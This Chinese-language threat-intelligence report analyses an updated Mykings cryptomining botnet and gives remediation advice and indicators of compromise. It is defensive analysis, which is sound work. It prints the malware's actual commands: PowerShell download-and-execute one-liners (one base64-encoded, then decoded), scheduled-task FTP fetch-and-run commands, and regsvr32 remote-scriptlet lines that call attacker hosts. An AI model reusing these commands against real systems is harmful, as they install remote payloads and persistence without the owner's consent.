背景騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網絡更新基礎設施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,
背景
騰訊安全御見威脅情報中心近期檢測到Mykings挖礦僵尸網絡更新基礎設施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,并且仍每天以約10個XMR的速度挖掘。
Mykings通過1433端口爆破、永恒之藍漏洞攻擊等方法進入系統,然后植入RAT、Miner等木馬,組成龐大的僵尸網絡。
Mykings挖礦僵尸網絡更新版本具有以下特點:
1. 利用永恒之藍漏洞、1433端口爆破等方法進行攻擊,并包含Mirai僵尸網絡的感染代碼。
2. 感染MBR(感染流程與暗云病毒一致),通過Rookit對抗殺軟以及下載Payload。
3. 清除競品挖礦木馬,關閉端口封堵其他病毒的入侵渠道。
4. 通過安裝多個計劃任務后門、WMI后門進行持久化。
Mykings挖礦僵尸網絡
詳細分析
被感染設備通過WMI后門執行Powershell命令
$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;
然后從blue.txt中獲取3個木馬的下載地址,依次下載和執行:
上述三個木馬分析如下:
ok.exe
ok.exe功能為感染MBR。從而實現自保護,殺軟對抗,以及聯網下載payload的功能。
感染流程與騰訊御見威脅情報中心發現的暗云系列病毒(參考https://s.tencent.com/research/report/622.html)類似。MBR木馬在最后一個階段對ZwCreateSection進行HOOK, 在獲得執行機會后將rootkit映射到內核空間并執行,最后跳轉到ZwCreateSection繼續執行。
Rootkit主要功能為自保護, 結束殺軟進程,及注入系統進程winlogon.exe聯網下載payload執行下一階段的惡意行為。
Rootkit獲取用于更新木馬的IP地址http[:]//www.upme0611.info/address.txt
獲取下一階段Payload代碼配置文件http[:]//mbr.kill0604.ru/cloud.txt,從該配置文件中得到挖礦模塊upsupx.exe的下載地址,隨后下載執行該文件。
upsupx.exe
upsupx.exe被下載保存至C:\Windows\Temp\conhost.exe執行。下載解密挖礦相關配置文件到C:\Program Files\Common Files\xpdown.dat,配置文件內容如下:
45.58.135.106
74.222.14.61
139.5.177.10
ok.xmr6b.ru
獲取要清除的競爭對手或者老版本的挖礦木馬,包括文件名、路徑、是否清除。
然后通過讀注冊表位置(HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)
檢測CPU類型及頻率,根據CPU的類型和頻率確定使用哪種類型的挖礦程序。
下載開源挖礦程序XMRig,地址為http[:]//198.148.90.34/64work.rar,程序版本2.14.1,挖礦程序啟動路徑為C:\Windows\inf\lsmm.exe
啟動后從資源文件中獲取挖礦配置文件,得到礦池地址:pool.minexmr.com:5555
錢包455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2
根據錢包查詢收益:已挖礦獲得1077個XMR
當前市場價格折合人民幣60萬元
u.exe
u.exe利用攻擊模塊C:\Windows\system\msinfo.exe對內網以及外網機器IP段進行掃描攻擊,方法包括利用永恒之藍漏洞、SQL爆破、Telnet爆破、RDP爆破等,部分攻擊payload還包含感染mirai僵尸網絡的相關代碼。
掃描445/1433等端口
永恒之藍漏洞攻擊
SQL爆破攻擊
爆破登錄后執行Shellcode
Telnet爆破攻擊
RDP爆破攻擊
持久化
Myings挖礦僵尸網絡會使用以下手法進行持久化:
1. 刪除其他病毒設置的登錄賬戶
通過net user刪除賬戶mm123$、admin、sysadm05;attrib命令設置Temp目錄下文件為隱藏屬性;taskkill殺死其他挖礦進程,刪除其他挖礦進程文件、遠程桌面程序文件;cacls設置部分目錄及文件的可見性。
通過wmic命令刪除偽裝成系統進程的挖礦程序,判斷依據為文件為系統進程名,但是卻不在系統目錄下。
2.設置相關文件、路徑的屬性為隱藏
3.關閉系統自更新
刪除以下計劃任務,關閉系統自更新:
SCHTASKS/Delete/TN"WindowsUpdate1"/F&SCHTASKS/Delete/TN"WindowsUpdate3"/F&SCHTASKS/Delete/TN"Windows_Update"/F&SCHTASKS/Delete/TN"Update"/F&SCHTASKS/Delete/TN"Update2"/F&SCHTASKS/Delete/TN"Update4"/F&SCHTASKS/Delete/TN"Update3"/F&SCHTASKS/Delete/TN"windowsinit"/F&SCHTASKS/Delete/TN"SystemSecurityCheck"/F&SCHTASKS/Delete/TN"AdobeFlashPlayer"/F&SCHTASKS/Delete/TN"updat_windows"/F&SCHTASKS/Delete/TN"at1"/F&SCHTASKS/Delete/TN"at2"/F&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Enterprise]"/F&SCHTASKS/DELETE/TN"\Microsoft\Windows\UPnP\Services"/f&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Standard]"/F
4.阻止139/445等端口的連接
網絡防火墻設置,設置65536端口的連接請求為允許,設置135/137/138/139/445端口的連接為拒絕。
5.添加注冊表啟動項
添加注冊表Run啟動項:
6.添加大量計劃任務后門
添加5個計劃任務:
任務1:Mysa
執行:cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe
任務2:Mysa1
執行:rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa
任務3:Mysa2
執行:cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
任務4:Mysa3
執行:/c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe
任務5:ok
執行:cmd c:\windows\debug\ok.dat,ServiceMainaaaa
各計劃任務后門功能整理如下:
7.添加執行大量命令的WMI后門
通過創建WMI事件過濾器和消費者來添加后門。
刪除舊的事件過濾器和消費者:
fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4
創建新的事件過濾器和消費者:
fuckyoumm3
fuckyoumm4
WMI后門執行的代碼為:
(1)powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="
(解碼后:
$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;})
(2)powershell.exe IEX
(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')
(3)powershell.exe IEX
(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')
(4)powershell.exe IEX
(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll
(5)regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll
(6)regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll
WMI后門執行的命令功能整理如下:
安全建議
1、MS010-17 “永恒之藍”漏洞
服務器暫時關閉不必要的端口(如135、139、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
下載并更新Windows系統補丁,及時修復永恒之藍系列漏洞
XP、WindowsServer2003、win8等系統訪問:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、WindowsServer 2008、Windows10,WindowsServer2016等系統訪問:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
2、服務器使用高強度密碼,切勿使用弱口令,防止黑客暴力破解;
3、使用殺毒軟件攔截可能的病毒攻擊;
4、感染Mykings病毒的用戶除了使用騰訊御點進行查殺外,還可通過以下步驟進行手動清理:
1)刪除文件
C:\Windows\System32\ok.exe
C:\WINDOWS\system32\max.exe
C:\Windows\SysWOW64\drivers\64.exe
C:\WINDOWS\system\downs.exe
C:\WINDOWS\Temp\conhost.exe
C:\windows\system32\upsupx.exe
C:\Windows\inf\lsmm.exe
C:\WINDOWS\inf\msief.exe
C:\windows\system32\s.exe
C:\WINDOWS\system\msinfo.exe
C:\Windows\Help\lsmosee.exe
C:\windows\debug\lsmosee.exe
C:\windows\debug\item.dat
2)刪除注冊表
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start
HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start
3)刪除計劃任務
Mysa
Mysa1
Mysa2
Mysa3
ok
4)刪除WMI事件過濾器及消費者
fuckyoumm2_filter fuckyoumm2_consumer WindowsEventsFilter WindowsEventsConsumer4 WindowsEventsConsumer fuckayoumm3 fuckayoumm4
fuckyoumm3
fuckyoumm4
IOCs
MD5
9F86AFAE88B2D807A71F442891DFE3D4
147BA798E448EB3CAA7E477E7FB3A959
B89B37A90D0A080C34BBBA0D53BD66DF
1A5EC4861CC11742D308145C32A3842A
5835094B232F999C20FE2B76E9673455
49CC3130496079EBFEA58A069AA4B97A
E5F19CBFBBABA501D4D9A90856FF17D3
A1B9F55BF93E82550B4C21CD3230C3C3
1F0EC5A4B101837EA7CD08FCB3247B2B
FA066F84F3D657DFB9ADF8E0F92F03E7
A1B9F55BF93E82550B4C21CD3230C3C3
IP
139.5.177.10
74.222.14.94
208.110.71.194
80.85.152.247
66.117.2.182
70.39.124.70
150.107.76.227
103.213.246.23
45.58.135.106
103.95.28.54
74.222.14.61
198.148.90.34
185.22.172.13
223.25.247.240
192.187.111.66
66.117.6.174
173.208.139.170
139.5.177.19
173.247.239.186
79.124.78.127
78.142.29.152
74.222.14.61
54.255.141.50
Domain
www.upme0611.info
mbr.kill0604.ru
ok.xmr6b.ru
js.0603bye.info
pc.pc0416.xyz
down2.b5w91.com
wmi.1217bye.host
down.mys2018.xyz
URL
http[:]//74.222.14.94/blue.txt
http[:]//js.0603bye.info:280/v.sct
http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe
http[:]//185.22.172.13/upsupx.exe
http[:]//www.upme0611.info/address.txt
http[:]//103.213.246.23/address.txt
http[:]//208.110.71.194/cloud.txt
http[:]//mbr.kill0604.ru/cloud.txt
http[:]//mbr.kill0604.ru/TestMsg64.tmp
http[:]//mbr.kill0604.ru/TestMsg.tmp
http[:]//45.58.135.106/kill.txt
http[:]//45.58.135.106/md5.txt
http[:]//45.58.135.106/xpxmr.dat
http[:]//198.148.90.34/64.rar
http[:]//45.58.135.106/vers1.txt
http[:]//208.110.71.194/cloud.txt
http[:]//185.22.172.13/upsupx.exe
http[:]//ok.xmr6b.ru/xpdown.dat
http[:]//ok.xmr6b.ru/ok/vers.html
http[:]//ok.xmr6b.ru/ok/down.html
http[:]//198.148.90.34/64work.rar
http[:]//198.148.90.34/upsupx.exe
http[:]//198.148.90.34/b.exe
http[:]//198.148.90.34/b2.exe
http[:]//198.148.90.34:808/b2.exe
http[:]//198.148.90.34/cudart32_65.dll
http[:]//198.148.90.34/0228.rar
http[:]//223.25.247.240/ok/ups.html
http[:]//173.208.139.170/up.txt
https[:]//173.208.139.170/s.txt
http[:]//173.208.139.170/2.txt
http[:]//wmi.1217bye.host/2.txt
http[:]//wmi.1217bye.host/S.ps1
http[:]//173.208.139.170/s.txt
http[:]//139.5.177.19/s.jpg
http[:]//wmi.1217bye.host/1.txt
http[:]//173.208.139.170/2.txt
http[:]//139.5.177.19/3.txt
http[:]//173.247.239.186/max.exe
http[:]//173.247.239.186/ups.exe
http[:]//173.247.239.186/upsupx.exe
http[:]//139.5.177.19/l.txt
http[:]//79.124.78.127/up.txt
錢包:455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2
參考鏈接
https://www.freebuf.com/articles/web/146393.html
https://s.tencent.com/research/report/622.html
https://www.freebuf.com/column/187489.html
來源:騰訊御見威脅情報中心
